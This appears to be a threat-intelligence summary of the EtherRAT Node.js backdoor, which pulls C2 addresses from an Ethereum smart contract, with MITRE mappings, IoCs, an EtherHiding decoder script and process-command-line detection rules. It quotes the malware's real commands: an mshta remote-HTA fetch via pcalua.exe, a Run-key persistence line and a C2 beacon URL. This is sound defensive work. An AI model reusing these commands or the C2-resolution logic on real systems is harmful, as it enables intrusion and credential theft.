eSentire TRU discovered EtherRAT, a Node.js backdoor that retrieves C2 addresses from Ethereum smart contracts (EtherHiding), performs extensive host fingerprinting, and uses CDN-like HTTPS beaconing to blend malicious traffic. The campaign involved initial access via ClickFix and IT Support scams (pcalua.exe -> mshta.exe), persistence via HKCU Run with conhost proxying node.exe, and widespread use of Obfuscator.io for code obfuscation. #EtherRAT #EtherHiding
Keypoints
- eSentire TRU detected EtherRAT in a Retail customer environment; EtherRAT is a Node.js backdoor enabling arbitrary command execution and asset theft (cryptocurrency wallets, cloud credentials).
- EtherRAT retrieves C2 addresses via EtherHiding by reading smart contract data on Ethereum and refreshes C2 addresses using setString events, increasing takedown resilience.
- Initial access observed included ClickFix (LOLBin pcalua.exe -> mshta.exe indirect execution) and social-engineering IT Support scams over Microsoft Teams with QuickAssist for remote access.
- Persistence is established by creating an HKCU Run registry value (random 12-character name) that launches conhost.exe --headless to proxy-execute node.exe with the EtherRAT payload.
- Malware stages: stage 1 decrypts a stager (AES-256-CBC) and uses module._compile(); stage 2 (Obfuscator.io) decrypts and writes the EtherRAT payload to disk then executes it.
- Command-and-control uses Ethereum RPC providers to fetch the smart-contract-stored C2 and then polls C2 via HTTPS CDN-like URLs; EtherRAT can reobfuscate itself by POSTing source to C2.
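The EtherHiding lookup described above, as an added example that is not code from eSentire's report or from EtherRAT itself: it builds the JSON-RPC eth_call request for the contract listed in the IoCs and decodes the ABI-encoded string that a Solidity string getter (or the data field of a setString event) returns, taking the first usable answer from several providers. The function selector, the user name, and the sample responses are constructed: the report does not name the getter, and the decoder is fed a synthetic value rather than the real C2.

```python
"""Resolving an EtherHiding C2 string from Ethereum JSON-RPC data.

A Solidity string getter and a setString event both carry the value as an
ABI-encoded dynamic string: a 32-byte offset, a 32-byte length, then the UTF-8
bytes right-padded to a 32-byte boundary. One decoder therefore handles both the
`result` of eth_call and the `data` field of an eth_getLogs entry.
"""
import json
from typing import List, Optional

WORD = 32  # ABI word size in bytes
CONTRACT = "0xe26c57b7fa8de030238b0a71b3d063397ac127d3"  # contract named in the report


def abi_encode_string(s: str) -> str:
    """ABI-encode one dynamic string (used here only to build sample data)."""
    raw = s.encode("utf-8")
    padded = raw + b"\x00" * (-len(raw) % WORD)
    head = WORD.to_bytes(WORD, "big") + len(raw).to_bytes(WORD, "big")
    return "0x" + (head + padded).hex()


def abi_decode_string(hexdata: str) -> str:
    """Decode an ABI-encoded dynamic string, rejecting truncated payloads."""
    data = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(data) < 2 * WORD:
        raise ValueError("payload shorter than offset + length words")
    offset = int.from_bytes(data[:WORD], "big")
    if offset + WORD > len(data):
        raise ValueError("offset points outside payload")
    length = int.from_bytes(data[offset:offset + WORD], "big")
    start = offset + WORD
    if start + length > len(data):
        raise ValueError("declared length exceeds payload")
    return data[start:start + length].decode("utf-8")


def build_eth_call(contract: str, selector: str, rpc_id: int = 1) -> dict:
    """JSON-RPC body asking a provider to run the contract's string getter.

    `selector` is the 4-byte function selector (first 4 bytes of keccak256 of
    the signature); the report does not name the getter, so the caller supplies
    it rather than this example guessing one.
    """
    return {"jsonrpc": "2.0", "id": rpc_id, "method": "eth_call",
            "params": [{"to": contract, "data": selector}, "latest"]}


def extract_c2(rpc_response: str) -> Optional[str]:
    """Return the C2 string from an eth_call response, or None for an error."""
    body = json.loads(rpc_response)
    if "error" in body or not body.get("result"):
        return None
    return abi_decode_string(body["result"])


def first_valid_c2(responses: List[str]) -> Optional[str]:
    """EtherRAT queries several providers; accept the first well-formed answer
    so one rate-limited or dead endpoint does not break resolution."""
    for resp in responses:
        try:
            c2 = extract_c2(resp)
        except (ValueError, UnicodeDecodeError, json.JSONDecodeError):
            continue
        if c2:
            return c2
    return None


# Constructed sample responses (not captured traffic): the first provider fails,
# the second returns an ABI-encoded string standing in for the stored C2 address.
SAMPLE_RESPONSES = [
    json.dumps({"jsonrpc": "2.0", "id": 1,
                "error": {"code": -32000, "message": "rate limited"}}),
    json.dumps({"jsonrpc": "2.0", "id": 1,
                "result": abi_encode_string("https://c2.example.invalid/api")}),
]

if __name__ == "__main__":
    # "0x00000000" is a placeholder selector; substitute the real getter's.
    print(json.dumps(build_eth_call(CONTRACT, "0x00000000")))
    print("resolved C2:", first_valid_c2(SAMPLE_RESPONSES))
```

For hunting, the same decoder applied to the data field of each setString event pulled with eth_getLogs for the contract address gives the history of C2 addresses the operators have rotated through, which is what makes the contract a durable indicator even when the domains change.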
MITRE Techniques
- [T1218] System Binary Proxy Execution - pcalua.exe is used to proxy-execute mshta.exe to retrieve a malicious HTA: pcalua.exe -a mshta.exe -c hxxps://www-flow-submission-management.shepherdsestates[.]uk/shep.hta
- [T1547.001] Registry Run Keys / Startup Folder - persistence via an HKCU Run value created with reg.exe that auto-starts EtherRAT through the conhost proxy: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "0c939bf7ae8f" ... conhost.exe --headless "C:\Users\<user>\AppData\Local\VZM5DHxgYbxq\node.exe" "C:\Users\<user>\AppData\Local\VZM5DH...\TlHAiIlxoF.bin"
- [T1071] Application Layer Protocol - C2 beaconing over HTTPS using CDN-like URL patterns to blend traffic and retrieve commands: hxxps://aurineuroth[.]com/api/5f459179/29e96c95-62a5-49e5-a8ba-7ebfbf560ab7/b435a6b1.ico?b=9e2f9c07-f85a-4089-8669-186f56bca7b3
- [T1027] Obfuscated Files or Information - use of Obfuscator.io to obfuscate the Node.js stages and EtherRAT: "given the appearance and functionality of this stage, we conclude it was obfuscated via Obfuscator.io"
- [T1204] User Execution - social engineering via ClickFix and IT Support scams (Microsoft Teams + QuickAssist) to get users to execute code or allow remote access: "TRU observed the use of ClickFix; however, in most incidents TRU has observed, IT Support scams are conducted over Microsoft Teams, followed by the use of QuickAssist."
- [T1005] Data from Local System - theft of local assets including cryptocurrency wallets and cloud credentials: "steal assets such as cryptocurrency wallets and cloud credentials."
- [T1105] Ingress Tool Transfer - downloading and extracting tooling (portable Node.js) via curl to stage the runtime: "C:\Windows\System32\curl.exe" -s -L -o "C:\Users\<user>\AppData\Local\Temp\QE35OO5mUa.zip" "https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip"
- [T1059] Command and Scripting Interpreter - execution of malicious Node.js code in memory via module._compile() and child_process.spawn(), plus PowerShell and shell commands for host fingerprinting.
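Detection logic for the execution chain above, as an added example that is not part of eSentire's report: each rule is a regex over the process-creation command line, and the rules are run over constructed events modelled on the command lines quoted in this section. The user name jdoe, the `/t REG_SZ /d` portion of the reg add command (which the report elides), and the two benign events are assumptions made for the sample.

```python
"""Hunt for the EtherRAT execution chain in process-creation telemetry.

Each rule pairs a compiled regex over the command line with the behaviour it
flags: pcalua.exe proxying mshta.exe, curl pulling a portable Node.js zip,
reg.exe writing an HKCU Run value that wraps node.exe in conhost.exe --headless,
and conhost.exe itself launching node.exe from a user-writable directory.
"""
import re
from typing import Dict, List, Tuple

# Raw string: the doubled backslashes are regex escapes for literal backslashes.
RUN_KEY = r"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"

RULES: List[Tuple[str, re.Pattern]] = [
    ("pcalua.exe proxying mshta.exe with a remote HTA (T1218 / ClickFix)",
     re.compile(r"pcalua\.exe.*\s-a\s+mshta\.exe.*\s-c\s+\S+", re.I)),
    ("curl fetching a portable Node.js runtime (T1105)",
     re.compile(r"curl\.exe.*nodejs\.org/dist/\S*win-x64\.zip", re.I)),
    ("HKCU Run value launching node.exe through conhost --headless (T1547.001)",
     re.compile(r"reg(\.exe)?\s+add\s+\"?" + RUN_KEY
                + r"\"?.*conhost\.exe\s+--headless.*node\.exe", re.I)),
    ("conhost.exe --headless running node.exe from AppData\\Local (T1218)",
     re.compile(r"conhost\.exe\s+--headless\s+\"?[A-Z]:\\Users\\[^\"]*"
                r"\\AppData\\Local\\[^\"]*node\.exe", re.I)),
]


def scan(events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Return (event id, reason) for every rule that fires on each event."""
    hits: List[Tuple[int, str]] = []
    for ev in events:
        cmd = str(ev["cmd"])
        for reason, pattern in RULES:
            if pattern.search(cmd):
                hits.append((int(ev["id"]), reason))
    return hits


# Constructed sample events modelled on the command lines in the report; not
# real telemetry. Events 5 and 6 are benign controls that must not fire.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "image": "cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /min /c "pcalua.exe -a mshta.exe -c hxxps://www-flow-submission-management.shepherdsestates[.]uk/shep.hta"'},
    {"id": 2, "image": "curl.exe",
     "cmd": r'"C:\Windows\System32\curl.exe" -s -L -o "C:\Users\jdoe\AppData\Local\Temp\QE35OO5mUa.zip" "https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip"'},
    {"id": 3, "image": "reg.exe",
     "cmd": r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "0c939bf7ae8f" /t REG_SZ /d "conhost.exe --headless \"C:\Users\jdoe\AppData\Local\VZM5DHxgYbxq\node.exe\" \"C:\Users\jdoe\AppData\Local\VZM5DHxgYbxq\TlHAiIlxoF.bin\"" /f'},
    {"id": 4, "image": "conhost.exe",
     "cmd": r'conhost.exe --headless "C:\Users\jdoe\AppData\Local\VZM5DHxgYbxq\node.exe" "C:\Users\jdoe\AppData\Local\VZM5DHxgYbxq\TlHAiIlxoF.bin"'},
    {"id": 5, "image": "conhost.exe",  # normal console host launch
     "cmd": r'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1'},
    {"id": 6, "image": "node.exe",  # developer running a build script
     "cmd": r'"C:\Program Files\nodejs\node.exe" build.js'},
]

if __name__ == "__main__":
    for event_id, reason in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {reason}")
```

Legitimate ConPTY sessions also start conhost.exe --headless, but with --width/--height/--signal arguments rather than an executable path, so the last rule keys on node.exe under a user-writable AppData\Local directory instead of on the flag alone; treat it as a hunting query and pair it with the Run-key rule, which has far fewer benign matches.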
Indicators of Compromise
- [Domain] EtherRAT C2 and compromised hosting - aurineuroth[.]com, jariosos[.]com, and 9 more C2 domains (hayesmed[.]com, regancontrols[.]com, salinasrent[.]com, justtalken[.]com, mebeliotmasiv[.]com, euclidrent[.]com, o-parana[.]com, palshona[.]com, etc.)
- [IP] C2 IP address - 185.218.19.162 (associated with aurineuroth[.]com / ASN 400992 "ZhouyiSat Communications")
- [File hash] Malware and staging artifacts - 2edf1ab615b489e228a89c617d24f66d1e780a6d5e30f6886608dfe79325acf8 (shep.hta), 5623f4f8942872b2b7cb6d2674c126a42bdf6ed5d1f37c1afc348529e4697d73 (stage 1), and 9 more hashes
- [File name] Stager and payload filenames - aeJ8aMT9ogQtKEb.dat (encrypted stager), 2htgIPQLUYA3aWq.cfg (encrypted EtherRAT blob), TLHA1IlxoF.bin (decrypted payload written to disk)
- [Command Line] Notable execution strings - C:\Windows\system32\cmd.exe /min /c "pcalua.exe -a mshta.exe -c hxxps://www-flow-submission-management.shepherdsestates[.]uk/shep.hta" and reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "0c939bf7ae8f" ... conhost.exe --headless ... node.exe TLHAiIlxoF.bin
- [URL] Download staging URL - https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip (used to download the portable Node.js runtime)
- [Ethereum Smart Contract] Smart contract used for EtherHiding C2 - 0xe26c57b7fa8de030238b0a71b3d063397ac127d3 (events show setString updates with C2 addresses)
- [RPC Provider] Blockchain RPC endpoints used to retrieve contract data - https://eth.llamarpc.com (one of multiple RPC providers queried concurrently)